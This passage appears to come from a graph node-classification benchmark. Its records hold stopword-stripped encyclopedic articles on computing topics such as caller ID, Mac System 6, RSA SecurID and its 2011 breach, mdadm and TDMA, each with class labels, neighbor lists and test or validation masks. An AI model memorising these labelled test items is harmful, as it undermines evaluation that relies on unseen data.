subscribers integrated services digital network isdn legislation section 276 australia industry code calling number display acif c522 february 2003 united states telemarketers required transmit caller id requirement went effect january 29 2004 courts ruled caller id admissible providers required fcc rules offer per-call blocking caller id customers legislation united states made caller id spoofing illegal fraudulent purposes starting mid-2017 intended culmination 2019 fcc pushed forward caller id certification implemented via methodology shaken/stir caller id blocking common term service caller prevent display calling number recipient telephone blocking number formally referred calling line identification restriction clir telecommunications regulators vary requirements use effectiveness assorted technologies prevent numbers displayed generally unlisted numbers always blocked non-published regular listed numbers usually blocked varying treatment determination call display blocking many factors desired customers inquire carefully make sure number displayed telephone service provider may also vertical service codes dialed configure blocking active calls call-by-call basis locations united states regulations allow require blocking automatic transparent caller blocking applied call-by-call basis time call made subscribers block caller id dialing special code vertical service code vsc making call north america regions code *67 1167 rotary dial united kingdom ireland 141 special code block information companies using call capture technology means equipment caller id simply display word private withheld cnid blocked caller request number actually transmitted entire telephone network presentation withheld flag set destination co expected honor flag sometimes not—especially destination phone number served isdn pri alternatively cases caller id blocked automatically released call-by-call basis dialing special code *82 north america 1470 uk see enabling similarly countries offer anonymous caller rejection rejects calls subscriber name number blocked telephone companies protect clients receiving blocked information routing anonymous calls service privacy manager caller required announce service asks called party want accept reject call telephone companies play recording caller advising called party rejection configuration often offer advice prefixing dialing *82 get call intended called party emergency services likely able show restricted number using service called calling line identification restriction override cliro using general ani services features create cat-and-mouse game type situation whereby subscribers must purchase additional services order cancel services prefixing telephone number following codes disables caller id per-call basis countries networks vary however gsm mobile networks callers may dial 31 number wish call disable countries network providers allow caller id blocking based domestic telecommunications regulations clir available external app value-added service depending operator country number prefix codes unblock caller id gsm mobile networks callers may dial *31 enable caller id subsequent calls caller id spoofing practice causing telephone network display number recipient caller id display different actual originating station many telephone services isdn pri based pbx installations voice ip services permit caller configure customized caller id information corporate settings permits announcement switchboard number customer service numbers caller id spoofing may illegal countries certain situations consumer telephone company must pay small fee caller id text transmitted call fee called cnam dip fee named dip fee consumer carrier pays fee dip originating telephone company database get caller id information several companies engage generating dip fees catering companies make large number outbound calls callerid4u pacific telecom communications group cater telemarketers generate revenue fees caller id information telemarketers enter agreement companies like callerid4u pacific telecom communications group share revenue produced telemarketing call consumers face significant barriers exiting call list often removed list calling opt-out numbers often results fast-busy call never completes consumer remains list according reports companies like callerid4u thousands phone numbers thousands ftc complaints filed month violating call registration large number phone numbers dilute number complaints company phone number",
    "neighbors": [
      8192,
      9732,
      11671,
      1949,
      10660,
      5163,
      4273,
      7221,
      1083,
      5052,
      10299,
      448,
      4163,
      1121,
      9572,
      2920,
      5225,
      7400,
      1899,
      1518,
      4590,
      9073,
      8950
    ],
    "mask": "Test"
  },
  {
    "node_id": 11171,
    "label": 2,
    "text": "System_6:system 6 system 6 also referred system software 6 graphical user interface-based operating system macintosh computers released 1988 apple computer inc. part classic mac os series operating systems system 6 included new macintosh computers succeeded system 7 1991 boxed version system 6 cost 49 introduced system 6 classed monolithic operating system features improved multifinder allows co-operative multitasking new utility called macromaker included system 6 enabled allowed users record mouse keyboard input macros macromaker unique user interface aimed look act like tape recorder macromaker criticized lack features compared microsoft automac iii already available commercially macromaker recorded locations mouse-clicks inside windows clicked exactly users soon found could used automate sophisticated programs pre-recorded clicks would miss buttons moved failed appear upon playback addition macromaker limitations recorded start end locations mouse movements precise path movements macros handle situations required macro wait period time action macromaker compatible system 7 marked introduction applescript alternative cooperative multitasking made macintosh debut march 1985 program called switcher andy hertzfeld allowed user launch multiple applications switch many programs features function correctly switcher also switcher display windows applications beside selected one included operating system available apple separate purchase system 5 system 6 feature called multifinder instead much mature widely used system 6 multifinder could enabled disabled reboot disabled finder would quit user launched another application thus freeing ram enabled system behaved nowadays familiar multitasking tradition desktop windows applications screen background system 6 included support apple imagewriter lq postscript laser printers new software drivers allowed imagewriter lq used appletalk local area networks supports use tabloid b size paper system 6 also included quickergraf originally called quickerdraw piece system software used accelerate drawing color screen images macintosh ii licensed apple radius inc programmer andy hertzfeld system 6 apple menu used launch applications current application icon upper right-hand corner menu bar cycles open applications menu system 6 supports 24 bits addressable ram random access memory allowed maximum 8 megabytes ram provision virtual memory limitations fixed system 7 version hfs file system used system 6 also volume size limit supports 2 gigabytes gb 65,536 files volume limitation increased system 7.5 first increased limit 4 gb trash known wastebasket british versions empties finder terminates multifinder running occurs soon application launches icons desktop system 6 organized single folder later operating systems instead system records whether file desktop inefficient confusing user browse desktop applications besides finder even within standard open save dialog boxes furthermore dialogs primitive mostly unchanged since 1984 lack aliases shortcuts files another limitation file management system 6 custom file folder icons also supported problems remedied system 7 maximum 15 desk accessories may installed one time including chooser scrapbook control panel system 6 uses control panel desk accessory access installed control panels imposes severe user interface limitations desk accessories installed removed within finder requires font/da mover utility system 7 also fixed control panels however contained separate files methods exist interface personalization finder allows icon assigned color desktop background limited 8x8 pixel color tiled pattern color patterns introduced system 5 standard window frames black white however many init extension files existed add color customization system 7 later allowed user change color various aspects user interface 1989 system 6 user interface need change comparison nextstep operating system time system 6 make use sound user interface presented several limitations terms file management way windows displayed initial releases system 6 unstable many third party software developers receive copies release resulting widespread compatibility problems first many common software programs microsoft excel microsoft works 4th dimension fully compatible system 6 also software bugs color manager script manager sound manager extension files apple announced 66 bugs fixed 6.0.1 update released september 1988 however major bug involving text spacing screen fonts found 6.0.1 distribution began led quick release 6.0.2 solved problem customers waited longer moving system 6 poor reputation already gained system 6 officially supported apple many different machines shipped system 6 may apple computers system 6 officially supported may nevertheless able run perhaps limitations",
    "neighbors": [
      10755,
      9732,
      1542,
      1549,
      3598,
      4114,
      6675,
      6165,
      6186,
      7211,
      8754,
      9778,
      1592,
      9784,
      8767,
      576,
      8774,
      7244,
      1623,
      9308,
      3167,
      3681,
      3691,
      6258,
      10357,
      7292,
      4741,
      7307,
      147,
      7830,
      6807,
      5784,
      11430,
      3241,
      3248,
      1215,
      4807,
      713,
      4810,
      2768,
      209,
      7378,
      213,
      3286,
      9952,
      6377,
      4844,
      5363,
      8441,
      11513,
      3324,
      4879,
      11539,
      11037,
      8480,
      4910,
      7983,
      7991,
      2363,
      7483,
      2365,
      2366,
      11257,
      10052,
      9035,
      8525,
      8534,
      3928,
      8540,
      8544,
      3948,
      9084,
      11649,
      6022,
      6023,
      3977,
      6539,
      5520,
      6048,
      8114,
      8628,
      10691,
      7133,
      9700,
      5093,
      5619,
      2551,
      2553,
      7163,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11172,
    "label": 4,
    "text": "HMG_Infosec_Standard_No.1:hmg infosec standard no.1 hmg information assurance standard no.1 usually abbreviated is1 security standard applied government computer systems uk standard used assess – suggest responses – technical risks confidentiality integrity availability government information modelling technique used standard adaptation domain based security confidentiality terms is1 apply information protectively marked may still used assess risks integrity availability information uk cabinet office security policy framework requires ict systems manage government information interconnected assessed identify technical risks is1 standard method mandated previous versions security policy framework methods may used results is1 assessment responses risks recorded using hmg information assurance standard no.2 usually abbreviated is2 concerns risk management relevant accreditation government computer systems cesg provides is1 risk assessment tools hmg is2 full accreditation statement based hmg is1 itshc security health check deloitte subsequent remediation recipero interface recipero nmpr uk government pnc systems used track mobile devices law enforcement purposes posted publicly public hmg is2 full accreditation statement based actual itshc deloitte case puts auditor reputation line way confidential statement",
    "neighbors": [
      10823,
      7979,
      5870,
      5423,
      8274,
      4595,
      10034,
      7740,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11173,
    "label": 2,
    "text": "UDID:udid udid acronym unique device id udid feature apple ios devices unique identifier single device fetched apple servers user tries activate device using icloud setup app id also used itunes detect phone communicate restoring ipsw firmware unique id formatted two ways devices introduced 2007 2018 represented 40-digit lowercase hex code device models introduced 2018 25-digit uppercase hex code written device cover imei retrieved itunes normal mode apple usually uses id assign apple id icloud id device also holds find iphone activation status udid calculated follows verizon iphone 4 devices use",
    "neighbors": [
      11137,
      9732,
      1290,
      3338,
      6539,
      1549,
      9999,
      784,
      7697,
      4888,
      5784,
      3483,
      4251,
      6264,
      9123,
      10023,
      171,
      6700,
      8109,
      4399,
      3248,
      9784,
      4283,
      2492,
      7869,
      446,
      7614,
      576,
      9022,
      1346,
      838,
      2502,
      456,
      6654,
      1482,
      10878,
      3790,
      464,
      4180,
      3286,
      8662,
      10838,
      3293,
      4318,
      6495,
      4068,
      5093,
      6884,
      231,
      2023,
      8806,
      2282,
      3691,
      1772,
      4844,
      7806,
      8170,
      9063,
      10602,
      7154,
      10608,
      2936,
      11257,
      2686,
      6783
    ],
    "mask": "Test"
  },
  {
    "node_id": 11174,
    "label": 2,
    "text": "Pieter_Van_den_Abeele:pieter van den abeele pieter van den abeele computer programmer founder powerpc-version gentoo linux foundation connected distribution linux computer operating system founded gentoo os x received scholarship apple computer 2004 pieter invited opensolaris pilot program assisted sun microsystems building development eco-system around solaris pieter nominated opensolaris community advisory board managed team developers make gentoo available solaris operating system well pieter co-author gentoo handbook teams managed pieter van den abeele shaped powerpc landscape several firsts gentoo/powerpc first distribution introduce powerpc live cds gentoo also beat apple releasing full 64-bit powerpc userland environment ibm powerpc 970 g5 processor gentoo-based home media communication system based freescale semiconductor powerpc 7447 processor best show award inaugural 2005 freescale technology forum orlando florida pieter also member power.org consortium participates committees workgroups focusing disruptive business plays around power architecture",
    "neighbors": [
      9665,
      11363,
      8102,
      3472,
      823,
      8700,
      9342
    ],
    "mask": "Test"
  },
  {
    "node_id": 11175,
    "label": 4,
    "text": "RSA_SecurID:rsa securid rsa securid formerly referred securid mechanism developed security dynamics later rsa security rsa security division emc performing two-factor authentication user network resource rsa securid authentication mechanism consists token — either hardware e.g key fob software soft token — assigned computer user creates authentication code fixed intervals usually 60 seconds using built-in clock card factory-encoded almost random key known seed seed different token loaded corresponding rsa securid server rsa authentication manager formerly ace/server tokens purchased on-demand tokens also available provide tokencode via email sms delivery eliminating need provision token user token hardware designed tamper-resistant deter reverse engineering software implementations algorithm software tokens appeared market public code developed security community allowing user emulate rsa securid software access current rsa securid code original 64-bit rsa securid seed file introduced server later 128-bit rsa securid algorithm published part open source library rsa securid authentication scheme seed record secret key used generate one-time passwords newer versions also feature usb connector allows token used smart card-like device securely storing certificates user authenticating network resource—say dial-in server firewall—needs enter personal identification number number displayed moment rsa securid token though increasingly rare systems using rsa securid disregard pin implementation altogether rely password/rsa securid code combinations server also real-time clock database valid cards associated seed records authenticates user computing number token supposed showing moment time checking user entered older versions securid duress pin may used—an alternate code creates security event log showing user forced enter pin still providing transparent authentication using duress pin would allow one successful authentication token automatically disabled duress pin feature deprecated available currently supported versions rsa securid system adds layer security network difficulty occur authentication server clock becomes sync clock built authentication tokens normal token clock drift accounted automatically server adjusting stored drift value time sync condition result normal hardware token clock drift correcting synchronization authentication manager server clock sync token tokens accomplished several different ways server clock drifted administrator made change system clock tokens either resynchronized one-by-one stored drift values adjusted manually drift done individual tokens bulk using command line utility rsa security pushed forth initiative called ubiquitous authentication partnering device manufacturers ironkey sandisk motorola freescale semiconductor redcannon broadcom blackberry embed securid software everyday devices usb flash drives cell phones reduce cost number objects user must carry token codes easily stolen mutual-authentication exists anything steal password also steal token code significant since principal threat users believe solving technology simplest practical vulnerability password container losing special key device activated smart phone integrated key function vulnerability healed single token container device within preset time span activation consideration presumes loss prevention e.g additional electronic leash body sensor alarm rsa securid tokens offer level protection password replay attacks designed offer protection man middle type attacks used alone attacker manages block authorized user authenticating server next token code valid able log server risk-based analytics rba new feature latest version 8.0 provides significant protection type attack user enabled authenticating agent enabled rba rsa securid prevent man browser mitb based attacks securid authentication server tries prevent password sniffing simultaneous login declining authentication requests two valid credentials presented within given time frame documented unverified post john g. brainard attacker removes user ability authenticate however securid server assume user actually authenticating hence allow attacker authentication attack model system security improved using encryption/authentication mechanisms ssl although soft tokens may convenient critics indicate tamper-resistant property hard tokens unmatched soft token implementations could allow seed record secret keys duplicated user impersonation occur hard tokens hand physically stolen acquired via social engineering end users small form factor makes hard token theft much viable laptop/desktop scanning user typically wait one day reporting device missing giving attacker plenty time breach unprotected system could occur however users userid pin also known risk-based analytics provide additional protection use lost stolen tokens even users userid pin known attackers batteries go flat periodically requiring complicated replacement re-enrollment procedures 2003 rsa securid commanded 70 two-factor authentication market 25 million devices produced date number competitors vasco make similar security tokens mostly based open oath hotp standard study otp published gartner 2010 mentions oath securid competitors network authentication systems opie s/key sometimes generally known otp s/key trademark telcordia technologies formerly bellcore attempt provide something level authentication without requiring hardware token 17 march 2011 rsa announced victims extremely sophisticated cyber attack concerns raised specifically reference securid system saying information could potentially used reduce effectiveness current two-factor authentication implementation however formal form 8-k submission indicated believe breach would material impact financial results breach cost emc parent company rsa 66.3 million taken charge second quarter earnings covered costs investigate attack harden systems monitor transactions corporate customers according emc executive vice president chief financial officer david goulden conference call analysts breach rsa network carried hackers sent phishing emails two targeted small groups employees rsa attached email excel file containing malware rsa employee opened excel file malware exploited vulnerability adobe flash exploit allowed hackers use poison ivy remote administration tool gain control machines access servers rsa network hints breach involved theft rsa database mapping token serial numbers secret token seeds injected make one unique reports rsa executives telling customers ensure protect serial numbers tokens lend credibility hypothesis barring fatal weakness cryptographic implementation token code generation algorithm unlikely since involves simple direct application extensively scrutinized aes-128 block cipher circumstance attacker could mount successful attack without physical possession token token seed records leaked rsa stated release details extent attack give potential attackers information could use figuring attack system 6 june 2011 rsa offered token replacements free security monitoring services 30,000 securid customers following attempted cyber breach defense customer lockheed martin appeared related securid information stolen rsa spite resulting attack one defense customers company chairman art coviello said believe still believe customers protected april 2011 unconfirmed rumors cited l-3 communications attacked result rsa compromise may 2011 information used attack lockheed martin systems however lockheed martin claims due aggressive actions company information security team customer program employee personal data compromised significant tenacious attack department homeland security us defense department offered help determine scope attack",
    "neighbors": [
      1024,
      5636,
      3590,
      9744,
      9745,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      10801,
      1083,
      1608,
      3657,
      8779,
      9817,
      4703,
      8288,
      8292,
      10341,
      2154,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      2208,
      161,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      6907,
      4863,
      2815,
      3843,
      10502,
      10003,
      278,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      11605,
      857,
      1882,
      7515,
      3956,
      9082,
      11152,
      3473,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      10173,
      9664,
      8133,
      4054,
      7639,
      8664,
      4575,
      1504,
      9186,
      1511,
      11244,
      2542,
      8694,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 11176,
    "label": 1,
    "text": "Integrated_manufacturing_database:integrated manufacturing database integrated database system used small large businesses means incorporate manufacturing process updates stores records information view rapid retrieval examples could include capable performing searches particular part may present many different products",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 11177,
    "label": 4,
    "text": "Microsoft_Exchange_Hosted_Services:microsoft exchange hosted services microsoft exchange hosted services also known frontbridge email filtering system owned microsoft acquired 2005 frontbridge inc. frontbridge technologies began 2000 bigfish communications marina del rey california service sold directly partnership sprint nextel 30 march 2006 microsoft announced new branding new licensing model road map microsoft exchange hosted services ehs formerly known frontbridge technologies inc. microsoft exchange hosted services ehs four new products introduced ehs filtering filter actively help protect inbound outbound e-mail spam viruses phishing scams e-mail policy violations ehs archive message archiving system e-mail instant messages ehs continuity security-enhanced web interface allowed ongoing access e-mail unplanned outages on-premises e-mail environment ehs encryption preserve e-mail confidentiality allowing users send receive encrypted e-mail",
    "neighbors": [
      7809,
      1948,
      9053
    ],
    "mask": "Test"
  },
  {
    "node_id": 11178,
    "label": 4,
    "text": "Backblaze:backblaze backblaze data storage provider offers two products founded 2007 backblaze raised total 5.3 million capital profitable backblaze first product computer backup offering allows user back data continuously manually computer idle hourly schedule service makes use aes encryption security uses data compression bandwidth optimization reduce upload download times files need restored delivered form digital download external usb hard drive 8 tb usb flash drive 256 gb september 2015 backblaze launched new product b2 cloud storage infrastructure service iaas targeted software integration though web frontend apis also available directly competes similar services amazon s3 microsoft azure google cloud april 2018 backblaze announced cloud computing partnerships directly connect backblaze data centers partners packet servercentral offering high-performance cloud computing data stored b2 cloud storage transfer fees data uploaded onto backblaze data center sharded 17 data shards plus three parity shards file parity shard bits computed reed–solomon error correction algorithm shards stored 20 storage pods separate cabinet increase resilience power loss entire cabinet backblaze states vault architecture designed 99.999999999 eleven 9s annual durability computer backup backblaze uses combination aes ssl encryption protect user data data stored backblaze storage pods vaults using reed-solomon erasure coding encrypted user private key secured user password username default encryption private keys done server side unlikely protect government subpoena serious data breach users desiring additional security privacy use optional private encryption key pek backblaze b2 cloud storage data stored backblaze storage pods vaults using reed-solomon erasure coding encryption handled entirely user client software used manage stored data making immune government subpoena data breach protecting data transfer ultimate storage backblaze data centers 2009 2011 backblaze released cad drawings computer case used storage servers datacenters commercial off-the-shelf components x64 processors disks motherboards high-density storage servers built lower cost commercial ones february 2013 version 3.0 pod introduced increased storage capacity upgrades march 2014 version 4.0 pod introduced faster simpler less expensive tweaked version 4.5 march 2015 november 2015 version 5.0 storage pod released motherboard cpu sata cards upgraded memory increased 32gb april 2016 version 6.0 storage pod released",
    "neighbors": [
      5504,
      11201,
      4194,
      6565,
      3366,
      10088,
      6797,
      1935,
      7983,
      1142,
      2487,
      3800,
      7546,
      11581,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 11179,
    "label": 6,
    "text": "Mdadm:mdadm mdadm linux utility used manage monitor software raid devices used modern gnu/linux distributions place older software raid utilities raidtools2 raidtools mdadm free software maintained copyrighted neil brown suse licensed terms version 2 later gnu general public license name derived md multiple device device nodes administers manages replaced previous utility mdctl original name mirror disk changed functions added name understood short multiple disk device management linux software raid configurations include anything presented linux kernel block device includes whole hard drives example partitions example raid 10 distinct raid 0+1 consists top-level raid 1 mirror composed high-performance raid 0 stripes directly across physical hard disks single-drive failure raid 10 configuration results one lower-level mirrors entering degraded mode top-level stripe performing normally except performance hit single-drive failure raid 0+1 configuration results one lower-level stripes completely failing top-level mirror entering degraded mode two setups preferable depends details application question whether spare disks available spun original standard form names md devices number 0 99 recent kernels support names 2.4.x kernels earlier two options non-partitionable since 2.6.x kernels new type md device introduced partitionable array device names modified changing partitions identified adding partition number thus example since version 2.6.28 linux kernel mainline non-partitionable arrays partitioned partitions referred way partitionable arrays example since version 3.7 linux kernel mainline md supports trim operations underlying solid-state drives ssds linear raid 0 raid 1 raid 5 raid 10 layouts since support md found kernel issue using kernel running specifically present boot loader either e lilo grub legacy although normally present may present grub 2 order circumvent problem filesystem must used either without md support else raid1 latter case system boot treating raid1 device normal filesystem system running remounted md second disk added result catch-up filesystems usually small recent bootloaders possible load md support kernel module initramfs mechanism approach allows filesystem inside raid system without need complex manual configuration besides formats raid volumes metadata linux software raid also supports external metadata formats since version 2.6.27 linux kernel version 3.0 userspace utility allows linux use various firmware- driver-based raid volumes also known fake raid two supported formats external metadata mdmpd daemon used monitoring md multipath devices developed red hat part mdadm package program used monitor multipath raid devices usually started boot time service afterwards running daemon enterprise storage requirements often include desire one way talk single disk drive event failure talk disk drive via one controller system automatically switch another controller keep going called multipath disk access linux kernel implements multipath disk access via software raid stack known md multiple devices driver kernel portion md multipath driver handles routing i/o requests proper device handling failures active path try find path previously failed might working daemon upon startup reads current state md raid arrays saves state waits kernel tell something interesting happened wakes checks see paths multipath device failed starts poll failed path every 15 seconds starts working starts working daemon add path back multipath md device originally part new spare path one using filesystem lists active md devices information mdmpd requires find arrays monitor paths get notification interesting events",
    "neighbors": [
      1891,
      8676,
      1990,
      1993,
      7983,
      8602,
      9455,
      9882,
      6003,
      823,
      7802,
      2045,
      6014
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11180,
    "label": 3,
    "text": "GNU_Mach:gnu mach gnu mach implementation mach microkernel default microkernel gnu hurd gnu mach runs ia-32 machines gnu mach maintained developers gnu project distributed terms gnu general public license gpl early versions hurd developed top cmu mach 3.0 1994 cmu stopped working mach gnu project switched university utah mach 4 kernel known gnu mach derived mach 4 utah stopped development first changelog entry thomas bushnell rather utah researcher 16 december 1996 2002 roland mcgrath branched oskit-mach branch gnu mach 1.2 intending replace device drivers hardware support code oskit release gnu mach 1.3 branch intended become gnu mach 2.0 main line however 2006 oskit-mach developed gnu mach 1.4 released 27 september 2013 eleven years 1.3",
    "neighbors": [
      2050,
      2180,
      5380,
      11654,
      7561,
      4493,
      1939,
      7187,
      5397,
      6300,
      802,
      3618,
      7983,
      5555,
      5049,
      9148,
      10813,
      10687,
      10822,
      5703,
      2761,
      5833,
      9931,
      8147,
      5976,
      9176,
      3674,
      2010,
      10464,
      8673,
      9579,
      8304,
      1394,
      5363,
      8436,
      11123,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 11181,
    "label": 5,
    "text": "Time-division_multiple_access:time-division multiple access time-division multiple access tdma channel access method shared-medium networks allows several users share frequency channel dividing signal different time slots users transmit rapid succession one using time slot allows multiple stations share transmission medium e.g radio frequency channel using part channel capacity tdma used digital 2g cellular systems global system mobile communications gsm is-136 personal digital cellular pdc iden digital enhanced cordless telecommunications dect standard portable phones tdma first used satellite communication systems western union westar 3 communications satellite 1979 used extensively satellite communications combat-net radio systems passive optical network pon networks upstream traffic premises operator usage dynamic tdma packet mode communication see tdma type time-division multiplexing tdm special point instead one transmitter connected one receiver multiple transmitters case uplink mobile phone base station becomes particularly difficult mobile phone move around vary timing advance required make transmission match gap transmission peers 2g cellular systems notable exception is-95 based tdma gsm d-amps pdc iden phs examples tdma cellular systems gsm combines tdma frequency hopping wideband transmission minimize common types interference gsm system synchronization mobile phones achieved sending timing advance commands base station instructs mobile phone transmit earlier much compensates propagation delay resulting light speed velocity radio waves mobile phone allowed transmit entire time slot guard interval end time slot transmission moves guard period mobile network adjusts timing advance synchronize transmission initial synchronization phone requires even care mobile transmits way actually know offset required reason entire time slot dedicated mobiles attempting contact network known random-access channel rach gsm mobile attempts broadcast beginning time slot received network mobile located next base station time delay succeed however mobile phone less 35 km base station time delay mean mobile broadcast arrives end time slot case mobile instructed broadcast messages starting nearly whole time slot earlier would expected otherwise finally mobile beyond 35 km cell range gsm rach arrive neighbouring time slot ignored feature rather limitations power limits range gsm cell 35 km special extension techniques used changing synchronization uplink downlink base station however limitation overcome although major 3g systems primarily based upon cdma time-division duplexing tdd packet scheduling dynamic tdma packet oriented multiple access schemes available 3g form combined cdma take advantage benefits technologies popular form umts 3g system uses cdma frequency division duplexing fdd instead tdma tdma combined cdma time-division duplexing two standard umts utra itu-t g.hn standard provides high-speed local area networking existing home wiring power lines phone lines coaxial cables based tdma scheme g.hn master device allocates contention-free transmission opportunities cftxop slave devices network one device use cftxop time thus avoiding collisions flexray protocol also wired network used safety-critical communication modern cars uses tdma method data transmission control radio systems tdma usually used alongside frequency-division multiple access fdma frequency division duplex fdd combination referred fdma/tdma/fdd case gsm is-136 example exceptions include dect personal handy-phone system phs micro-cellular systems umts-tdd umts variant china td-scdma use time-division duplexing different time slots allocated base station handsets frequency major advantage tdma radio part mobile needs listen broadcast time slot rest time mobile carry measurements network detecting surrounding transmitters different frequencies allows safe inter frequency handovers something difficult cdma systems supported is-95 supported complex system additions universal mobile telecommunications system umts turn allows co-existence microcell layers macrocell layers cdma comparison supports soft hand-off allows mobile phone communication 6 base stations simultaneously type same-frequency handover incoming packets compared quality best one selected cdma cell breathing characteristic terminal boundary two congested cells unable receive clear signal often negate advantage peak periods disadvantage tdma systems create interference frequency directly connected time slot length buzz sometimes heard tdma phone left next radio speakers another disadvantage dead time time slots limits potential bandwidth tdma channel implemented part difficulty ensuring different terminals transmit exactly times required handsets moving need constantly adjust timings ensure transmission received precisely right time move base station signal take longer arrive also means major tdma systems hard limits cell sizes terms range though practice power levels required receive transmit distances greater supported range would mostly impractical anyway dynamic time-division multiple access dynamic tdma scheduling algorithm dynamically reserves variable number time slots frame variable bit-rate data streams based traffic demand data stream dynamic tdma used",
    "neighbors": [
      10112,
      4609,
      2306,
      388,
      8708,
      3847,
      2057,
      1550,
      11288,
      2458,
      5020,
      9373,
      4256,
      5664,
      1192,
      11560,
      7723,
      1969,
      2994,
      7490,
      11075,
      3140,
      9284,
      11591,
      5321,
      6857,
      7498,
      9038,
      4691,
      3156,
      2911,
      2912,
      2785,
      3168,
      5092,
      5863,
      361,
      2802,
      4594,
      9586,
      5497
    ],
    "mask": "Test"
  },
  {
    "node_id": 11182,
    "label": 4,
    "text": "EnCase:encase encase shared technology within suite digital investigations products guidance software acquired opentext software comes several products designed forensic cyber security security analytics e-discovery use encase traditionally used forensics recover evidence seized hard drives encase allows investigator conduct depth analysis user files collect evidence documents pictures internet history windows registry information company also offers encase training certification data recovered encase used various court systems cases btk killer murder danielle van dam additional encase forensic work documented cases evidence provided casey anthony unabomber mucko wakefield massacre cases encase originally created shawn mccreight founder guidance software 1997 home 1998 encase forensic officially released originally named expert witness windows time gui forensic tools available 2002 encase enterprise released allowing first network enabled digital forensic tool used forensic investigative security matters 2005 encase ediscovery released enabled network abilities encase allow identification collection preservation analysis esi litigation investigative purposes 2007 encase airs automated incident response suite released discontinued evolved encase endpoint security automate scanning documenting remediation abilities encase enterprise also 2007 release encase information assurance encase data audit policy enforcement also effectively integrated encase endpoint security 2008 encase cybersecurity released combined many tools automation previous security functions streamlined workflow incident response 2015 encase endpoint security released evolution endpoint security user friendly web interface well integration many security tools expedite shorten response time attack event 2016 encase enterprise needed face lift distributed agent formerly referred servlet given abilities redesign encase endpoint investigator also 2016 release encase risk manager data risk assessment audit dlp-like services compliance 2017 guidance software acquired opentext company name guidance software longer used encase technology available within number products currently including encase forensic encase endpoint investigator encase ediscovery includes encase legal hold encase endpoint security encase portable guidance software also runs training courses foundations computer forensics several expert series courses include enscripting course automate various functions within encase certification os offered train toward prove knowledge within various fields include ence encase certified examiner encep encase certified ediscovery practitioner cfsr certified forensic security responder encase training team trained 100000 individuals date encase contains tools several areas digital forensic process acquisition analysis reporting software also includes scripting facility called enscript various api interacting evidence encase contains functionality create forensic images suspect media images stored proprietary expert witness file format compressible file format prefixed case data information consists bit-by-bit i.e exact copy media inter-spaced crc hashes every 64k data file format also appends md5 hash entire drive footer encase v7 mobile phone analysis possible addition add-ons available guidance software",
    "neighbors": [
      3841,
      2437,
      6797,
      5010,
      4500,
      8469,
      3099,
      7968,
      6177,
      5284,
      7983,
      10290,
      4789,
      2231,
      4408,
      8635,
      830,
      2494,
      7369,
      6475,
      10189,
      1873,
      4049,
      4834,
      5475,
      7525,
      9319,
      9458,
      7160,
      11642
    ],
    "mask": "Test"
  },
  {
    "node_id": 11183,
    "label": 3,
    "text": "Socket_FM2+:socket fm2+ socket fm2+ fm2b cpu socket used amd desktop steamroller-based godavari apus steamroller-based connect motherboard fm2+ slightly different pin configuration socket fm2 two additional pin sockets socket fm2+ apus compatible socket fm2 motherboards due aforementioned additional pins however socket fm2 apus richland trinity compatible fm2+ socket pcie links capable supporting pcie 2.x data rates addition gfx link capable supporting pcie 3.x data rate available chipsets consult fusion controller hubs fch mobile counterpart socket fp3 µbga906 4 holes fastening heatsink motherboard placed rectangle lateral lengths 48 mm 96 mm amd sockets socket am2 socket am2+ socket am3 socket am3+ socket fm2 cooling solutions therefore interchangeable",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      9092,
      10375,
      3464,
      4872,
      5645,
      398,
      6033,
      7058,
      10260,
      4246,
      7963,
      2719,
      2463,
      4767,
      2850,
      7712,
      9122,
      1322,
      2094,
      1329,
      6705,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      11080,
      2764,
      7247,
      9551,
      7122,
      9427,
      10715,
      7132,
      2525,
      9057,
      4451,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651,
      11130
    ],
    "mask": "Test"
  },
  {
    "node_id": 11184,
    "label": 2,
    "text": "Comparison_of_operating_systems:comparison operating systems tables provide comparison operating systems computer devices listing general technical information number widely used currently available pc handheld including smartphone tablet computer operating systems article usage share operating systems provides broader general comparison operating systems includes servers mainframes supercomputers large number variety available linux distributions grouped single entry see comparison linux distributions detailed comparison also variety bsd dos operating systems covered comparison bsd operating systems comparison dos operating systems information views operating system see operating system advocacy posix compliant partly compliant systems like freebsd linux macos solaris basic commands standardized note linux systems may vary distribution specific program even 'command called via posix alias function example wanted use dos dir give directory listing one detailed file listing per line could use alias dir='ls -lahf e.g session configuration file",
    "neighbors": [
      2560,
      6155,
      11277,
      3598,
      1555,
      6675,
      7187,
      5142,
      8213,
      8725,
      25,
      9236,
      10776,
      4637,
      9249,
      9762,
      4643,
      6180,
      8229,
      5158,
      5677,
      3631,
      7217,
      10803,
      7733,
      2614,
      9784,
      5177,
      10809,
      1083,
      6207,
      576,
      2625,
      7234,
      8772,
      3142,
      6221,
      5714,
      3160,
      10333,
      1632,
      97,
      10851,
      11363,
      3173,
      6760,
      9320,
      8298,
      9835,
      10856,
      8301,
      5231,
      8816,
      7285,
      9333,
      4727,
      2168,
      633,
      634,
      1147,
      2172,
      3197,
      636,
      125,
      1150,
      5240,
      5247,
      2179,
      6276,
      7804,
      7806,
      9343,
      5256,
      10883,
      10891,
      6797,
      4238,
      10382,
      2193,
      2194,
      2197,
      9366,
      2199,
      6296,
      2201,
      9370,
      9882,
      7325,
      3742,
      9887,
      4775,
      5293,
      8879,
      2224,
      3248,
      178,
      7857,
      8368,
      6837,
      9907,
      6329,
      8889,
      700,
      5823,
      1216,
      7364,
      8388,
      10436,
      1736,
      2248,
      8904,
      9932,
      5840,
      6352,
      210,
      3283,
      8402,
      8404,
      7382,
      5335,
      7383,
      6361,
      8410,
      10962,
      4316,
      9436,
      1247,
      11489,
      2786,
